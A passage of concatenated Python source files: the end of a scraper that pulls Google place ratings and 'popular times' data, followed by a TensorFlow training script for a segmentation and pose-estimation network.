"!4f13.1!7i20!10b1!12m6!2m3!5m1!6e2!20e3!10b1!16b1!19m3!2m2!1i392!2i106!20m61!2m2!1i203!2i100!3m2!2i4!5b1"
"!6m6!1m2!1i86!2i86!1m2!1i408!2i200!7m46!1m3!1e1!2b0!3e3!1m3!1e2!2b1!3e2!1m3!1e2!2b0!3e3!1m3!1e3!2b0!3e3!"
"1m3!1e4!2b0!3e3!1m3!1e8!2b0!3e3!1m3!1e3!2b1!3e2!1m3!1e9!2b1!3e2!1m3!1e10!2b0!3e3!1m3!1e10!2b1!3e2!1m3!1e"
"10!2b0!3e4!2b1!4b1!9b0!22m6!1sa9fVWea_MsX8adX8j8AE%3A1!2zMWk6Mix0OjExODg3LGU6MSxwOmE5ZlZXZWFfTXNYOGFkWDh"
"qOEFFOjE!7e81!12e3!17sa9fVWea_MsX8adX8j8AE%3A564!18e15!24m15!2b1!5m4!2b1!3b1!5b1!6b1!10m1!8e3!17b1!24b1!"
"25b1!26b1!30m1!2b1!36b1!26m3!2m2!1i80!2i92!30m28!1m6!1m2!1i0!2i0!2m2!1i458!2i976!1m6!1m2!1i1075!2i0!2m2!"
"1i1125!2i976!1m6!1m2!1i0!2i0!2m2!1i1125!2i20!1m6!1m2!1i0!2i956!2m2!1i1125!2i976!37m1!1e81!42b1!47m0!49m1"
"!3b1"
}
search_url = "https://www.google.de/search?" + "&".join(k + "=" + str(v) for k, v in params_url.items())
logging.info("searchterm: " + search_url)
# noinspection PyUnresolvedReferences
gcontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
resp = urllib.request.urlopen(urllib.request.Request(url=search_url, data=None, headers=USER_AGENT),
context=gcontext)
data = resp.read().decode('utf-8').split('/*""*/')[0]
# find eof json
jend = data.rfind("}")
if jend >= 0:
data = data[:jend + 1]
jdata = json.loads(data)["d"]
jdata = json.loads(jdata[4:])
# get info from result array, has to be adapted if backend api changes
info = index_get(jdata, 0, 1, 0, 14)
rating = index_get(info, 4, 7)
rating_n = index_get(info, 4, 8)
popular_times = index_get(info, 84, 0)
# current_popularity is also not available if popular_times isn't
current_popularity = index_get(info, 84, 7, 1)
time_spent = index_get(info, 117, 0)
# extract wait times and convert to minutes
if time_spent:
nums = [float(f) for f in re.findall(r'\d*\.\d+|\d+', time_spent.replace(",", "."))]
contains_min, contains_hour = "min" in time_spent, "hour" in time_spent or "hr" in time_spent
time_spent = None
if contains_min and contains_hour:
time_spent = [nums[0], nums[1] * 60]
elif contains_hour:
time_spent = [nums[0] * 60, (nums[0] if len(nums) == 1 else nums[1]) * 60]
elif contains_min:
time_spent = [nums[0], nums[0] if len(nums) == 1 else nums[1]]
time_spent = [int(t) for t in time_spent]
return rating, rating_n, popular_times, current_popularity, time_spent
def get_detail(place_id):
"""
loads data for a given area
:return:
"""
global results
# detail_json = get_populartimes(params["API_key"], place_id)
detail_json = get_populartimes_by_detail(params["API_key"], g_places[place_id])
if params["all_places"] or "populartimes" in detail_json:
results.append(detail_json)
def get_populartimes(api_key, place_id):
"""
sends request to detail to get a search string
and uses standard proto buffer to get additional information
on the current status of popular times
:return: json details
"""
# places api - detail search
# https://developers.google.com/places/web-service/details?hl=de
detail_str = DETAIL_URL.format(place_id, api_key)
resp = json.loads(requests.get(detail_str, auth=('user', 'pass')).text)
check_response_code(resp)
detail = resp["result"]
return get_populartimes_by_detail(api_key, detail)
def get_populartimes_by_detail(api_key, detail):
address = detail["formatted_address"] if "formatted_address" in detail else detail["vicinity"]
place_identifier = "{} {}".format(detail["name"], address)
detail_json = {
"id": detail["place_id"],
"name": detail["name"],
"address": address,
"types": detail["types"],
"coordinates": detail["geometry"]["location"]
}
detail_json = add_optional_parameters(detail_json, detail, *get_populartimes_from_search(place_identifier))
return detail_json
def check_response_code(resp):
"""
check if query quota has been surpassed or other errors occured
:param resp: json response
:return:
"""
if resp["status"] == "OK" or resp["status"] == "ZERO_RESULTS":
return
if resp["status"] == "REQUEST_DENIED":
raise PopulartimesException("Google Places " + resp["status"],
"Request was denied, the API key is invalid.")
if resp["status"] == "OVER_QUERY_LIMIT":
raise PopulartimesException("Google Places " + resp["status"],
"You exceeded your Query Limit for Google Places API Web Service, "
"check https://developers.google.com/places/web-service/usage "
"to upgrade your quota.")
if resp["status"] == "INVALID_REQUEST":
raise PopulartimesException("Google Places " + resp["status"],
"The query string is malformed, "
"check if your formatting for lat/lng and radius is correct.")
if resp["status"] == "INVALID_REQUEST":
raise PopulartimesException("Google Places " + resp["status"],
"The query string is malformed, "
"check if your formatting for lat/lng and radius is correct.")
if resp["status"] == "NOT_FOUND":
raise PopulartimesException("Google Places " + resp["status"],
"The place ID was not found and either does not exist or was retired.")
raise PopulartimesException("Google Places " + resp["status"],
"Unidentified error with the Places API, please check the response code")
def run(_params):
"""
wrap execution logic in method, for later external call
:return:
"""
global params, g_places, q_radar, q_detail, results
start = datetime.datetime.now()
# shared variables
params = _params
q_radar, q_detail = Queue(), Queue()
g_places, results = dict(), list()
logging.info("Adding places to queue...")
# threading for radar search
for i in range(params["n_threads"]):
t = threading.Thread(target=worker_radar)
t.daemon = True
t.start()
# cover search area with circles
bounds = params["bounds"]
for lat, lng in get_circle_centers([bounds["lower"]["lat"], bounds["lower"]["lng"]], # southwest
[bounds["upper"]["lat"], bounds["upper"]["lng"]], # northeast
params["radius"]):
q_radar.put(dict(pos=(lat, lng), res=0))
q_radar.join()
logging.info("Finished in: {}".format(str(datetime.datetime.now() - start)))
logging.info("{} places to process...".format(len(g_places)))
# threading for detail search and popular times
for i in range(params["n_threads"]):
t = threading.Thread(target=worker_detail)
t.daemon = True
t.start()
for g_place_id in g_places:
q_detail.put(g_place_id)
q_detail.join()
logging.info("Finished in: {}".format(str(datetime.datetime.now() - start)))
return results
|
train.py
|
# --------------------------------------------------------
# FCN
# Copyright (c) 2016 RSE at UW
# Licensed under The MIT License [see LICENSE for details]
# Written by Yu Xiang
# --------------------------------------------------------
"""Train a FCN"""
from fcn.config import cfg
from gt_data_layer.layer import GtDataLayer
from gt_single_data_layer.layer import GtSingleDataLayer
from gt_synthesize_layer.layer import GtSynthesizeLayer
from utils.timer import Timer
import numpy as np
import os
import tensorflow as tf
import sys
import threading
import math
class SolverWrapper(object):
"""A simple wrapper around Caffe's solver.
This wrapper gives us control over he snapshotting process, which we
use to unnormalize the learned bounding-box regression weights.
"""
def __init__(self, sess, network, imdb, roidb, output_dir, pretrained_model=None, pretrained_ckpt=None):
"""Initialize the SolverWrapper."""
self.net = network
self.imdb = imdb
self.roidb = roidb
self.output_dir = output_dir
self.pretrained_model = pretrained_model
self.pretrained_ckpt = pretrained_ckpt
# For checkpoint
self.saver = tf.train.Saver(tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES), max_to_keep=12)
def snapshot(self, sess, iter):
"""Take a snapshot of the network after unnormalizing the learned
bounding-box regression weights. This enables easy use at test-time.
"""
net = self.net
if not os.path.exists(self.output_dir):
os.makedirs(self.output_dir)
infix = ('_' + cfg.TRAIN.SNAPSHOT_INFIX
if cfg.TRAIN.SNAPSHOT_INFIX != '' else '')
filename = (cfg.TRAIN.SNAPSHOT_PREFIX + infix + '_iter_{:d}'.format(iter+1) + '.ckpt')
filename = os.path.join(self.output_dir, filename)
self.saver.save(sess, filename, write_meta_graph=False)
print 'Wrote snapshot to: {:s}'.format(filename)
def restore(self, session, save_file):
reader = tf.train.NewCheckpointReader(save_file)
saved_shapes = reader.get_variable_to_shape_map()
var_names = sorted([(var.name, var.name.split(':')[0]) for var in tf.global_variables()
if var.name.split(':')[0] in saved_shapes])
var_name_to_var = {var.name : var for var in tf.global_variables()}
restore_vars = []
restored_var_names = set()
print('Restoring:')
with tf.variable_scope(tf.get_variable_scope(), reuse=True):
for var_name, saved_var_name in var_names:
if 'global_step' in var_name:
continue
if 'Variable' in var_name:
continue
curr_var = var_name_to_var[var_name]
var_shape = curr_var.get_shape().as_list()
if var_shape == saved_shapes[saved_var_name]:
restore_vars.append(curr_var)
print(str(saved_var_name))
restored_var_names.add(saved_var_name)
else:
print('Shape mismatch for var', saved_var_name, 'expected', var_shape, 'got', saved_shapes[saved_var_name])
ignored_var_names = sorted(list(set(saved_shapes.keys()) - restored_var_names))
if len(ignored_var_names) == 0:
print('Restored all variables')
else:
print('Did not restore:' + '\n\t'.join(ignored_var_names))
if len(restore_vars) > 0:
saver = tf.train.Saver(restore_vars)
saver.restore(session, save_file)
print('Restored %s' % save_file)
def train_model(self, sess, train_op, loss, learning_rate, max_iters, data_layer):
"""Network training loop."""
# add summary
tf.summary.scalar('loss', loss)
merged = tf.summary.merge_all()
train_writer = tf.summary.FileWriter(self.output_dir, sess.graph)
# intialize variables
sess.run(tf.global_variables_initializer())
if self.pretrained_model is not None:
print ('Loading pretrained model '
'weights from {:s}').format(self.pretrained_model)
self.net.load(self.pretrained_model, sess, True)
print self.pretrained_ckpt
if self.pretrained_ckpt is not None:
print ('Loading pretrained ckpt '
'weights from {:s}').format(self.pretrained_ckpt)
self.restore(sess, self.pretrained_ckpt)
tf.get_default_graph().finalize()
coord = tf.train.Coordinator()
if cfg.TRAIN.VISUALIZE:
load_and_enqueue(sess, self.net, data_layer, coord)
else:
t = threading.Thread(target=load_and_enqueue, args=(sess, self.net, data_layer, coord))
t.start()
last_snapshot_iter = -1
timer = Timer()
for iter in range(max_iters):
timer.tic()
summary, loss_value, lr, _ = sess.run([merged, loss, learning_rate, train_op])
train_writer.add_summary(summary, iter)
timer.toc()
print 'iter: %d / %d, loss: %.4f, lr: %.8f, time: %.2f' %\
(iter+1, max_iters, loss_value, lr, timer.diff)
if (iter+1) % (10 * cfg.TRAIN.DISPLAY) == 0:
print 'speed: {:.3f}s / iter'.format(timer.average_time)
if (iter+1) % cfg.TRAIN.SNAPSHOT_ITERS == 0:
last_snapshot_iter = iter
self.snapshot(sess, iter)
if last_snapshot_iter != iter:
self.snapshot(sess, iter)
sess.run(self.net.close_queue_op)
coord.request_stop()
coord.join([t])
def train_model_vertex(self, sess, train_op, loss, loss_cls, loss_vertex, loss_regu, learning_rate, max_iters, data_layer):
"""Network training loop."""
# add summary
# tf.summary.scalar('loss', loss)
# merged = tf.summary.merge_all()
# train_writer = tf.summary.FileWriter(self.output_dir, sess.graph)
# intialize variables
sess.run(tf.global_variables_initializer())
if self.pretrained_model is not None:
print ('Loading pretrained model '
'weights from {:s}').format(self.pretrained_model)
self.net.load(self.pretrained_model, sess, True)
if self.pretrained_ckpt is not None:
print ('Loading pretrained ckpt '
'weights from {:s}').format(self.pretrained_ckpt)
self.restore(sess, self.pretrained_ckpt)
tf.get_default_graph().finalize()
coord = tf.train.Coordinator()
if cfg.TRAIN.VISUALIZE:
load_and_enqueue(sess, self.net, data_layer, coord)
else:
t = threading.Thread(target=load_and_enqueue, args=(sess, self.net, data_layer, coord))
t.start()
# tf.train.write_graph(sess.graph_def, self.output_dir, 'model.pbtxt')
last_snapshot_iter = -1
timer = Timer()
for iter in range(max_iters):
timer.tic()
loss_value, loss_cls_value, loss_vertex_value, loss_regu_value, lr, _ = sess.run([loss, loss_cls, loss_vertex, loss_regu, learning_rate, train_op])
# train_writer.add_summary(summary, iter)
timer.toc()
print 'iter: %d / %d, loss: %.4f, loss_cls: %.4f, loss_vertex: %.4f, loss_regu: %.12f, lr: %.8f, time: %.2f' %\
(iter+1, max_iters, loss_value, loss_cls_value, loss_vertex_value, loss_regu_value, lr, timer.diff)
if (iter+1) % (10 * cfg.TRAIN.DISPLAY) == 0:
print 'speed: {:.3f}s / iter'.format(timer.average_time)
if (iter+1) % cfg.TRAIN.SNAPSHOT_ITERS == 0:
last_snapshot_iter = iter
self.snapshot(sess, iter)
if last_snapshot_iter != iter:
self.snapshot(sess, iter)
sess.run(self.net.close_queue_op)
coord.request_stop()
coord.join([t])
def train_model_vertex_pose(self, sess, train_op, loss, loss_cls, loss_vertex, loss_pose, learning_rate, max_iters, data_layer):
"""Network training loop."""
# add summary
# tf.summary.scalar('loss', loss)
# merged = tf.summary.merge_all()
# train_writer = tf.summary.FileWriter(self.output_dir, sess.graph)
coord = tf.train.Coordinator()
if cfg.TRAIN.VISUALIZE:
load_and_enqueue(sess, self.net, data_layer, coord)
else:
t = threading.Thread(target=load_and_enqueue, args=(sess, self.net, data_layer, coord))
t.start()
# intialize variables
sess.run(tf.global_variables_initializer())
if self.pretrained_model is not None:
print ('Loading pretrained model '
'weights from {:s}').format(self.pretrained_model)
self.net.load(self.pretrained_model, sess, True)
if self.pretrained_ckpt is not None:
print ('Loading pretrained ckpt '
'weights from {:s}').format(self.pretrained_ckpt)
self.restore(sess, self.pretrained_ckpt)
tf.get_default_graph().finalize()
# tf.train.write_graph(sess.graph_def, self.output_dir, 'model.pbtxt')
last_snapshot_iter = -1
timer = Timer()
for iter in range(max_iters):
timer.tic()
loss_value, loss_cls_value, loss_vertex_value, loss_pose_value, lr, _ = sess.run([loss, loss_cls, loss_vertex, loss_pose, learning_rate, train_op])
# train_writer.add_summary(summary, iter)
timer.toc()
print 'iter: %d / %d, loss: %.4f, loss_cls: %.4f, loss_vertex: %.4f, loss_pose: %.4f, lr: %.8f, time: %.2f' %\
(iter+1, max_iters, loss_value, loss_cls_value, loss_vertex_value, loss_pose_value, lr, timer.diff)
if (iter+1) % (10 * cfg.TRAIN.DISPLAY) == 0:
print 'speed: {:.3f}s / iter'.format(timer.average_time)
if (iter+1) % cfg.TRAIN.SNAPSHOT_ITERS == 0:
last_snapshot_iter = iter
self.snapshot(sess, iter)
if last_snapshot_iter != iter:
self.snapshot(sess, iter)
sess.run(self.net.close_queue_op)
coord.request_stop()
coord.join([t])
def train_model_vertex_pose_adapt(self, sess, train_op, loss, loss_cls, loss_vertex, loss_pose, \
loss_domain, label_domain, domain_label, learning_rate, max_iters, data_layer):
"""Network training loop."""
coord = tf.train.Coordinator()
if cfg.TRAIN.VISUALIZE:
load_and_enqueue(sess, self.net, data_layer, coord)
else:
t = threading.Thread(target=load_and_enqueue, args=(sess, self.net, data_layer, coord))
t.start()
# intialize variables
sess.run(tf.global_variables_initializer())
if self.pretrained_model is not None:
print ('Loading pretrained model '
'weights from {:s}').format(self.pretrained_model)
self.net.load(self.pretrained_model, sess, True)
if self.pretrained_ckpt is not None:
print ('Loading pretrained ckpt '
'weights from {:s}').format(self.pretrained_ckpt)
self.restore(sess, self.pretrained_ckpt)
tf.get_default_graph().finalize()
last_snapshot_iter = -1
timer = Timer()
for iter in range(max_iters):
timer.tic()
loss_value, loss_cls_value, loss_vertex_value, loss_pose_value, loss_domain_value, label_domain_value, domain_label_value, lr, _ = sess.run([loss, loss_cls, loss_vertex, loss_pose, loss_domain, label_domain, domain_label, learning_rate, train_op])
# train_writer.add_summary(summary, iter)
timer.toc()
print 'iter: %d / %d, loss: %.4f, loss_cls: %.4f, loss_vertex: %.4f, loss_pose: %.4f, loss_domain: %.4f, lr: %.8f, time: %.2f' %\
(iter+1, max_iters, loss_value, loss_cls_value, loss_vertex_value, loss_pose_value, loss_domain_value, lr, timer.diff)
print label_domain_value
print domain_label_value
if (iter+1) % (10 * cfg.TRAIN.DISPLAY) == 0:
print 'speed: {:.3f}s / iter'.format(timer.average_time)
if (iter+1) % cfg.TRAIN.SNAPSHOT_ITERS == 0:
last_snapshot_iter = iter
self.snapshot(sess, iter)
if last_snapshot_iter != iter:
self.snapshot(sess, iter)
sess.run(self.net.close_queue_op)
coord.request_stop()
coord.join([t])
def train_model_det(self, sess, train_op, loss, loss_rpn_cls, loss_rpn_box, loss_cls, loss_box, loss_pose, learning_rate, max_iters, data_layer):
"""Network training loop."""
# add summary
# tf.summary.scalar('loss', loss)
# merged = tf.summary.merge_all()
# train_writer = tf.summary.FileWriter(self.output_dir, sess.graph)
# intialize variables
sess.run(tf.global_variables_initializer())
if self.pretrained_model is not None:
print ('Loading pretrained model '
'weights from {:s}').format(self.pretrained_model)
self.net.load(self.pretrained_model, sess, True)
if self.pretrained_ckpt is not None:
print ('Loading pretrained ckpt '
'weights from {:s}').format(self.pretrained_ckpt)
self.restore(sess, self.pretrained_ckpt)
tf.get_default_graph().finalize()
coord = tf.train.Coordinator()
if cfg.TRAIN.VISUALIZE:
load_and_enqueue(sess, self.net, data_layer, coord)
else:
t = threading.Thread(target=load_and_enqueue, args=(sess, self.net, data_layer, coord))
t.start()
last_snapshot_iter = -1
timer = Timer()
for iter in range(max_iters):
timer.tic()
loss_value, loss_rpn_cls_value, loss_rpn_box_value, loss_cls_value, loss_box_value, loss_pose_value, lr, _ \
= sess.run([loss, loss_rpn_cls, loss_rpn_box, loss_cls, loss_box, loss_pose, learning_rate, train_op])
# train_writer.add_summary(summary, iter)
timer.toc()
print 'iter: %d / %d, loss: %.4f, loss_rpn_cls: %.4f, loss_rpn_box: %.4f, loss_cls: %.4f, loss_box: %.4f, loss_pose: %.4f, lr: %.8f, time: %.2f' %\
(iter+1, max_iters, loss_value, loss_rpn_cls_value, loss_rpn_box_value, loss_cls_value, loss_box_value, loss_pose_value, lr, timer.diff)
if (iter+1) % (10 * cfg.TRAIN.DISPLAY) == 0:
print 'speed: {:.3f}s / iter'.format(timer.average_time)
if (iter+1) % cfg.TRAIN.SNAPSHOT_ITERS == 0:
last_snapshot_iter = iter
self.snapshot(sess, iter)
if last_snapshot_iter != iter:
self.snapshot(sess, iter)
sess.run(self.net.close_queue_op)
coord.request_stop()
coord.join([t])
def get_training_roidb(imdb):
"""Returns a roidb (Region of Interest database) for use in training."""
if cfg.TRAIN.USE_FLIPPED:
print 'Appending horizontally-flipped training examples...'
imdb.append_flipped_images()
print 'done'
return imdb.roidb
def load_and_enqueue(sess, net, data_layer, coord):
iter = 0
while not coord.should_stop():
blobs = data_layer.forward(iter)
iter += 1
if cfg.INPUT == 'RGBD':
data_blob = blobs['data_image_color']
data_p_blob = blobs['data_image_depth']
elif cfg.INPUT == 'COLOR':
data_blob = blobs['data_image_color']
elif cfg.INPUT == 'DEPTH':
data_blob = blobs['data_image_depth']
elif cfg.INPUT == 'NORMAL':
data_blob = blobs['data_image_normal']
if cfg.TRAIN.SINGLE_FRAME:
if cfg.TRAIN.SEGMENTATION:
if cfg.INPUT == 'RGBD':
if cfg.TRAIN.VERTEX_REG_2D or cfg.TRAIN.VERTEX_REG_3D:
feed_dict={net.data: data_blob, net.data_p: data_p_blob, net.gt_label_2d: blobs['data_label'], net.keep_prob: 0.5, \
net.vertex_targets: blobs['data_vertex_targets'], net.vertex_weights: blobs['data_vertex_weights'], \
net.poses: blobs['data_pose'], net.extents: blobs['data_extents'], net.meta_data: blobs['data_meta_data']}
else:
feed_dict={net.data: data_blob, net.data_p: data_p_blob, net.gt_label_2d: blobs['data_label'], net.keep_prob: 0.5}
else:
if cfg.TRAIN.VERTEX_REG_2D or cfg.TRAIN.VERTEX_REG_3D:
feed_dict={net.data: data_blob, net.gt_label_2d: blobs['data_label'], net.keep_prob: 0.5, \
net.vertex_targets: blobs['data_vertex_targets'], net.vertex_weights: blobs['data_vertex_weights'], \
net.poses: blobs['data_pose'], net.extents: blobs['data_extents'], net.meta_data: blobs['data_meta_data'], \
net.points: blobs['data_points'], net.symmetry: blobs['data_symmetry']}
else:
feed_dict={net.data: data_blob, net.gt_label_2d: blobs['data_label'], net.keep_prob: 0.5}
else:
if cfg.INPUT == 'RGBD':
feed_dict={net.data: data_blob, net.data_p: data_p_blob, net.im_info: blobs['data_im_info'], \
net.gt_boxes: blobs['data_gt_boxes'], net.poses: blobs['data_pose'], \
net.points: blobs['data_points'], net.symmetry: blobs['data_symmetry'], net.keep_prob: 0.5}
else:
feed_dict={net.data: data_blob, net.im_info: blobs['data_im_info'], \
net.gt_boxes: blobs['data_gt_boxes'], net.poses: blobs['data_pose'], \
net.points: blobs['data_points'], net.symmetry: blobs['data_symmetry'], net.keep_prob: 0.5}
else:
if cfg.INPUT == 'RGBD':
feed_dict={net.data: data_blob, net.data_p: data_p_blob, net.gt_label_2d: blobs['data_label'], \
net.depth: blobs['data_depth'], net.meta_data: blobs['data_meta_data'], \
net.state: blobs['data_state'], net.weights: blobs['data_weights'], net.points: blobs['data_points'], net.keep_prob: 0.5}
else:
feed_dict={net.data: data_blob, net.gt_label_2d: blobs['data_label'], \
net.depth: blobs['data_depth'], net.meta_data: blobs['data_meta_data'], \
net.state: blobs['data_state'], net.weights: blobs['data_weights'], net.points: blobs['data_points'], net.keep_prob: 0.5}
sess.run(net.enqueue_op, feed_dict=feed_dict)
def loss_cross_entropy(scores, labels):
"""
scores: a list of tensors [batch_size, height, width, num_classes]
labels: a list of tensors [batch_size, height, width, num_classes]
"""
with tf.name_scope('loss'):
loss = 0
for i in range(cfg.TRAIN.NUM_STEPS):
score = scores[i]
label = labels[i]
cross_entropy = -tf.reduce_sum(label * score, reduction_indices=[3])
loss += tf.div(tf.reduce_sum(cross_entropy), tf.reduce_sum(label))
loss /= cfg.TRAIN.NUM_STEPS
return loss
def loss_cross_entropy_single_frame(scores, labels):
"""
scores: a tensor [batch_size, height, width, num_classes]
labels: a tensor [batch_size, height, width, num_classes]
"""
with tf.name_scope('loss'):
cross_entropy = -tf.reduce_sum(labels * scores, reduction_indices=[3])
loss = tf.div(tf.reduce_sum(cross_entropy), tf.reduce_sum(labels)+1e-10)
return loss
def loss_quaternion(pose_pred, pose_targets, pose_weights):
with tf.name_scope('loss'):
distances = 1 - tf.square( tf.reduce_sum(tf.multiply(pose_pred, pose_targets), reduction_indices=[1]) )
weights = tf.reduce_mean(pose_weights, reduction_indices=[1])
loss = tf.div( tf.reduce_sum(tf.multiply(weights, distances)), tf.reduce_sum(weights)+1e-10 )
return loss
def train_net(network, imdb, roidb, output_dir, pretrained_model=None, pretrained_ckpt=None, max_iters=40000):
"""Train a Fast R-CNN network."""
loss_regu = tf.add_n(tf.losses.get_regularization_losses(), 'regu')
if cfg.TRAIN.SINGLE_FRAME:
# classification loss
if cfg.NETWORK == 'FCN8VGG':
scores = network.prob
labels = network.gt_label_2d_queue
loss = loss_cross_entropy_single_frame(scores, labels) + loss_regu
else:
if cfg.TRAIN.VERTEX_REG_2D or cfg.TRAIN.VERTEX_REG_3D:
scores = network.get_output('prob')
labels = network.get_output('gt_label_weight')
loss_cls = loss_cross_entropy_single_frame(scores, labels)
vertex_pred = network.get_output('vertex_pred')
vertex_targets = network.get_output('vertex_targets')
vertex_weights = network.get_output('vertex_weights')
# loss_vertex = tf.div( tf.reduce_sum(tf.multiply(vertex_weights, tf.abs(tf.subtract(vertex_pred, vertex_targets)))), tf.reduce_sum(vertex_weights) + 1e-10 )
loss_vertex = cfg.TRAIN.VERTEX_W * smooth_l1_loss_vertex(vertex_pred, vertex_targets, vertex_weights)
if cfg.TRAIN.POSE_REG:
# pose_pred = network.get_output('poses_pred')
# pose_targets = network.get_output('poses_target')
# pose_weights = network.get_output('poses_weight')
# loss_pose = cfg.TRAIN.POSE_W * tf.div( tf.reduce_sum(tf.multiply(pose_weights, tf.abs(tf.subtract(pose_pred, pose_targets)))), tf.reduce_sum(pose_weights) )
# loss_pose = cfg.TRAIN.POSE_W * loss_quaternion(pose_pred, pose_targets, pose_weights)
loss_pose = cfg.TRAIN.POSE_W * network.get_output('loss_pose')[0]
if cfg.TRAIN.ADAPT:
domain_score = network.get_output("domain_score")
domain_label = network.get_output("domain_label")
label_domain = network.get_output("label_domain")
loss_domain = cfg.TRAIN.ADAPT_WEIGHT * tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(logits=domain_score, labels=label_domain))
loss = loss_cls + loss_vertex + loss_pose + loss_domain + loss_regu
else:
loss = loss_cls + loss_vertex + loss_pose + loss_regu
else:
loss = loss_cls + loss_vertex + loss_regu
else:
scores = network.get_output('prob')
labels = network.get_output('gt_label_weight')
loss = loss_cross_entropy_single_frame(scores, labels) + loss_regu
else:
# classification loss
scores = network.get_output('outputs')
labels = network.get_output('labels_gt_2d')
loss = loss_cross_entropy(scores, labels) + loss_regu
# optimizer
global_step = tf.Variable(0, trainable=False)
starter_learning_rate = cfg.TRAIN.LEARNING_RATE
learning_rate = tf.train.exponential_decay(starter_learning_rate, global_step,
cfg.TRAIN.STEPSIZE, 0.1, staircase=True)
momentum = cfg.TRAIN.MOMENTUM
train_op = tf.train.MomentumOptimizer(learning_rate, momentum).minimize(loss, global_step=global_step)
#config = tf.ConfigProto()
#config.gpu_options.per_process_gpu_memory_fraction = 0.85
#config.gpu_options.allow_growth = True
#with tf.Session(config=config) as sess:
with tf.Session(config=tf.ConfigProto(allow_soft_placement=True)) as sess:
# data layer
if cfg.TRAIN.SINGLE_FRAME:
data_layer = GtSynthesizeLayer(roidb, imdb.num_classes, imdb._extents, imdb._points_all, imdb._symmetry, imdb.cache_path, imdb.name, imdb.data_queue, cfg.CAD, cfg.POSE)
else:
data_layer = GtDataLayer(roidb, imdb.num_classes)
sw = SolverWrapper(sess, network, imdb, roidb, output_dir, pretrained_model=pretrained_model, pretrained_ckpt=pretrained_ckpt)
print 'Solving...'
if cfg.TRAIN.VERTEX_REG_2D or cfg.TRAIN.VERTEX_REG_3D:
if cfg.TRAIN.POSE_REG:
if cfg.TRAIN.ADAPT:
sw.train_model_vertex_pose_adapt(sess, train_op, loss, loss_cls, loss_vertex, loss_pose, \
loss_domain, label_domain, domain_label, learning_rate, max_iters, data_layer)
else:
sw.train_model_vertex_pose(sess, train_op, loss, loss_cls, loss_vertex, loss_pose, learning_rate, max_iters, data_layer)
else:
sw.train_model_vertex(sess, train_op, loss, loss_cls, loss_vertex, loss_regu, learning_rate, max_iters, data_layer)
else:
sw.train_model(sess, train_op, loss, learning_rate, max_iters, data_layer)
print 'done solving'
def smooth_l1_loss_vertex(vertex_pred, vertex_targets, vertex_weights, sigma=1.0):
sigma_2 = sigma ** 2
vertex_diff = vertex_pred - vertex_targets
diff = tf.multiply(vertex_weights, vertex_diff)
abs_diff = tf.abs(diff)
smoothL1_sign = tf.stop_gradient(tf.to_float(tf.less(abs_diff, 1. / sigma_2)))
in_loss = tf.pow(diff, 2) * (sigma_2 / 2.) * smoothL1_sign \
+ (abs_diff - (0.5 / sigma_2)) * (1. - smoothL1_sign)
loss = tf.div( tf.reduce_sum(in_loss), tf.reduce_sum(vertex_weights) + 1e-10 )
return loss
def smooth_l1_loss(bbox_pred, bbox_targets, bbox_inside_weights, bbox_outside_weights, sigma=1.0, dim=[1]):
sigma_2 = sigma ** 2
box_diff = bbox_pred - bbox_targets
in_box_diff = bbox_inside_weights * box_diff
abs_in_box_diff = tf.abs(in_box_diff)
smoothL1_sign = tf.stop_gradient(tf.to_float(tf.less(abs_in_box_diff, 1. / sigma_2)))
in_loss_box = tf.pow(in_box_diff, 2) * (sigma_2 / 2.) * smoothL1_sign \
+ (abs_in_box_diff - (0.5 / sigma_2)) * (1. - smoothL1_sign)
out_loss_box = bbox_outside_weights * in_loss_box
loss_box = tf.reduce_mean(tf.reduce_sum(
out_loss_box,
axis=dim
))
return loss_box
def train_net_det(network, imdb, roidb, output_dir, pretrained_model=None, pretrained_ckpt=None, max_iters=40000):
"""Train a Fast R-CNN network."""
loss_regu = tf.add_n(tf.losses.get_regularization_losses(), 'regu')
# RPN, class loss
rpn_cls_score = tf.reshape(network.get_output('rpn_cls_score_reshape'), [-1, 2])
rpn_label = tf.reshape(network.get_output('rpn_labels'), [-1])
rpn_select = tf.where(tf.not_equal(rpn_label, -1))
rpn_cls_score = tf.reshape(tf.gather(rpn_cls_score, rpn_select), [-1, 2])
rpn_label = tf.reshape(tf.gather(rpn_label, rpn_select), [-1])
loss_rpn_cls = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(logits=rpn_cls_score, labels=rpn_label))
# RPN, bbox loss
rpn_bbox_pred = network.get_output('rpn_bbox_pred')
rpn_bbox_targets = network.get_output('rpn_bbox_targets')
rpn_bbox_inside_weights = network.get_output('rpn_bbox_inside_weights')
rpn_bbox_outside_weights = network.get_output('rpn_bbox_outside_weights')
loss_rpn_box = smooth_l1_loss(rpn_bbox_pred, rpn_bbox_targets, rpn_bbox_inside_weights,
rpn_bbox_outside_weights, sigma=3.0, dim=[1, 2, 3])
# RCNN, class loss
cls_score = network.get_output("cls_score")
label = tf.reshape(network.get_output("labels"), [-1])
loss_cls = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(logits=cls_score, labels=label))
# RCNN, bbox loss
bbox_pred = network.get_output('bbox_pred')
bbox_targets = network.get_output('bbox_targets')
bbox_inside_weights = network.get_output('bbox_inside_weights')
bbox_outside_weights = network.get_output('bbox_outside_weights')
loss_box = smooth_l1_loss(bbox_pred, bbox_targets, bbox_inside_weights, bbox_outside_weights)
# pose regression loss
loss_pose = network.get_output('loss_pose')[0]
# add losses
loss = loss_rpn_cls + loss_rpn_box + loss_cls + loss_box + loss_pose + loss_regu
# optimizer
global_step = tf.Variable(0, trainable=False)
starter_learning_rate = cfg.TRAIN.LEARNING_RATE
learning_rate = tf.train.exponential_decay(starter_learning_rate, global_step,
cfg.TRAIN.STEPSIZE, 0.1, staircase=True)
momentum = cfg.TRAIN.MOMENTUM
train_op = tf.train.MomentumOptimizer(learning_rate, momentum).minimize(loss, global_step=global_step)
#config = tf.ConfigProto()
#config.gpu_options.per_process_gpu_memory_fraction = 0.85
#config.gpu_options.allow_growth = True
#with tf.Session(config=config) as sess:
with tf.Session(config=tf.ConfigProto(allow_soft_placement=True)) as sess:
sw = SolverWrapper(sess, network, imdb, roidb, output_dir, pretrained_model=pretrained_model, pretrained_ckpt=pretrained_ckpt)
# thread to load data
data_layer = GtSynthesizeLayer(roidb, imdb.num_classes, imdb._extents, imdb._points_all, imdb._symmetry, imdb.cache_path, imdb.name, cfg.CAD, cfg.POSE)
print 'Solving...'
